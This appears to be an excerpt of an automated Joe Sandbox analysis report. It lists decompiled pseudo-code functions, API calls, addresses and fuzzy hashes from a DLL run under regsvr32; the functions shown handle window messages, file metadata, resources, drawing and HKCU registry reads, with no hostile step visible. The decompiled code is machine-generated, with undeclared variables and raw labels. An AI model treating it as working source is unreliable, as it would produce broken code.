Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 3923860780-0
Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x10020852
0x10020853
0x10020856
0x1002085d
0x10020863
0x10020868
0x10020878
0x10020891
0x10020899
0x100208a1
0x100208a4
0x100208ae
0x100208ef
0x100208c4
0x100208c8
0x100208d5
0x00000000
0x100208d7
0x100208d7
0x100208dd
0x00000000
0x1002094a
0x1002094a
0x1002094a
0x00000000
0x1002094a
0x100208dd
0x00000000
0x100208d5
0x100208fa
0x10020904
0x10020943
0x1002091a
0x1002091f
0x10020922
0x10020937
0x10020937
0x10020941
0x00000000
0x00000000
0x10020924
0x10020932
0x00000000
0x10020934
0x10020934
0x00000000
0x10020934
0x10020932
0x00000000
0x10020922
0x1002087a
0x10020883
0x10020888
0x1002088b
0x1002094d
0x10020956
0x00000000
0x00000000
0x00000000
0x1002088b
0x10020958
0x10020958
0x10020868
0x1002095c

APIs

SendMessageA.USER32 ref: 10020883
SendMessageA.USER32 ref: 100208E8
SendMessageA.USER32 ref: 1002092D
SendMessageA.USER32 ref: 10020956

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

0x10026b57
0x10026b64
0x10026b66
0x10026b7a
0x10026b80
0x10026b83
0x10026b89
0x10026c56
0x00000000
0x10026c58
0x10026b97
0x10026ba4
0x10026bbf
0x00000000
0x10026bbf
0x10026baa
0x10026bb3
0x10026bb6
0x10026bb9
0x10026bc6
0x10026bcc
0x10026be4
0x10026bce
0x10026bce
0x10026bce
0x10026bf0
0x10026bf7
0x10026bfc
0x10026c08
0x10026c0f
0x10026c15
0x10026c21
0x10026c28
0x10026c2e
0x10026c36
0x10026c3a
0x10026c3f
0x10026c3f
0x10026c48
0x10026c4d
0x10026c53
0x10026c53
0x00000000
0x00000000
0x00000000
0x00000000

APIs

lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
GetFileAttributesA.KERNEL32(?), ref: 10026BD4

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}

0x1000c2a5
0x1000c2b3
0x00000000
0x1000c2b5
0x1000c2c3
0x1000c2c6
0x1000c2fa
0x1000c300
0x1000c30d
0x1000c313
0x1000c319
0x1000c31a
0x1000c31f
0x1000c324
0x1000c329
0x1000c332
0x1000c33e
0x1000c343
0x1000c368
0x1000c36e
0x1000c374
0x1000c377
0x1000c37c
0x1000c37c
0x1000c381
0x1000c386
0x1000c386
0x1000c38b
0x1000c390
0x1000c390
0x1000c392
0x1000c398
0x1000c39e
0x1000c3a0
0x1000c3a0
0x1000c39e
0x1000c329
0x1000c3aa
0x00000000
0x1000c2c8
0x1000c2ce
0x1000c2d5
0x1000c2d8
0x1000c2db
0x1000c2de
0x1000c2e1
0x1000c2e4
0x1000c2e7
0x1000c2ea
0x1000c2ef
0x1000c2f4
0x1000c3ac
0x00000000
0x1000c3ac
0x00000000
0x1000c2f4

APIs

VariantClear.OLEAUT32(?), ref: 1000C30D
SysFreeString.OLEAUT32(?), ref: 1000C37C
SysFreeString.OLEAUT32(?), ref: 1000C386
SysFreeString.OLEAUT32(?), ref: 1000C390

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

0x10036a70
0x10036a71
0x10036a73
0x10036a7b
0x10036a87
0x10036a8f
0x10036aad
0x10036aad
0x10036a91
0x10036a93
0x10036a9b
0x10036a9e
0x00000000
0x10036aa0
0x10036aa7
0x10036aab
0x10036ab5
0x10036ac0
0x10036ac2
0x10036ac4
0x10036ac9
0x10036acb
0x10036acb
0x10036ace
0x10036ad1
0x10036ad8
0x10036ada
0x10036adb
0x10036adb
0x10036ace
0x10036ae8
0x10036aed
0x10036aee
0x10036af0
0x10036af5
0x10036af8
0x10036afa
0x10036b0f
0x10036b1f
0x10036b1f
0x10036b24
0x10036b2b
0x00000000
0x00000000
0x00000000
0x10036aab
0x10036a9e
0x10036b30

APIs

FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
LoadResource.KERNEL32(?,00000000), ref: 10036A93
LockResource.KERNEL32(00000000), ref: 10036AA1
FreeResource.KERNEL32(?), ref: 10036B24

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000BEEF Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000BEEF(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011BF0(0x1003aec3, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10029068();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
				E100293B4(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}

0x1000bef4
0x1000befe
0x1000bf00
0x1000bf03
0x1000bf0d
0x1000bf10
0x1000bf15
0x1000bf18
0x1000bf33
0x1000bf34
0x1000bf3b
0x1000bf3e
0x00000000
0x1000bf40
0x1000bf43
0x1000bf66
0x1000bf45
0x1000bf4f
0x1000bf50
0x1000bf51
0x1000bf52
0x1000bf53
0x1000bf55
0x1000bf7a
0x1000bf88
0x1000bf8d
0x1000bf92
0x1000bf98
0x1000bf94
0x1000bf94
0x1000bf94
0x1000bf9e
0x1000bf9e
0x1000bf1a
0x1000bf1a
0x1000bf1a
0x1000bf1a
0x1000bfa0
0x1000bfa7
0x1000bfae
0x1000bfba
0x1000bfc2

APIs

__EH_prolog.LIBCMT ref: 1000BEF4
GetDC.USER32(?), ref: 1000BF2D
CreateRectRgnIndirect.GDI32(?), ref: 1000BF70

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateH_prologIndirectRect
String ID:
API String ID: 2123978231-0
Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

0x1002c747
0x1002c74b
0x1002c74f
0x1002c75b
0x1002c761
0x1002c765
0x1002c770
0x1002c770
0x1002c779
0x1002c77f
0x1002c781
0x1002c787
0x1002c787
0x1002c78f
0x1002c798
0x1002c7a9
0x1002c7bd
0x1002c7d0
0x1002c7dc
0x1002c7e9
0x1002c7ef
0x1002c7f1
0x1002c7f1
0x1002c7f3
0x1002c7f8
0x1002c7fa
0x1002c7ff

APIs

Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A

SendMessageA.USER32 ref: 1002C75B
GetTextMetricsA.GDI32(?,?), ref: 1002C779
SetRectEmpty.USER32(?), ref: 1002C798
GetSystemMetrics.USER32 ref: 1002C7D0

Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
String ID:
API String ID: 1847300772-0
Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}

0x10034b3f
0x10034b45
0x10034b4b
0x10034b4e
0x10034b51
0x10034b54
0x10034b5b
0x10034b5e
0x10034b63
0x10034bf1
0x10034bf2
0x10034bfe
0x10034bfe
0x10034b6a
0x10034b80
0x00000000
0x00000000
0x10034b82
0x10034b82
0x10034bd3
0x10034bd3
0x10034bd7
0x00000000
0x00000000
0x10034ba0
0x10034bab
0x10034bae
0x10034bae
0x10034bb1
0x10034bbd
0x10034bb3
0x10034bb3
0x10034bb3
0x10034bb1
0x10034bc3
0x10034bc6
0x10034bcd
0x10034bd0
0x10034bd0
0x10034bd9
0x10034bdc
0x10034be2
0x10034be7
0x10034be7
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
RegCloseKey.ADVAPI32(?), ref: 10034BDC
RegCloseKey.ADVAPI32(00000000), ref: 10034BF2

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
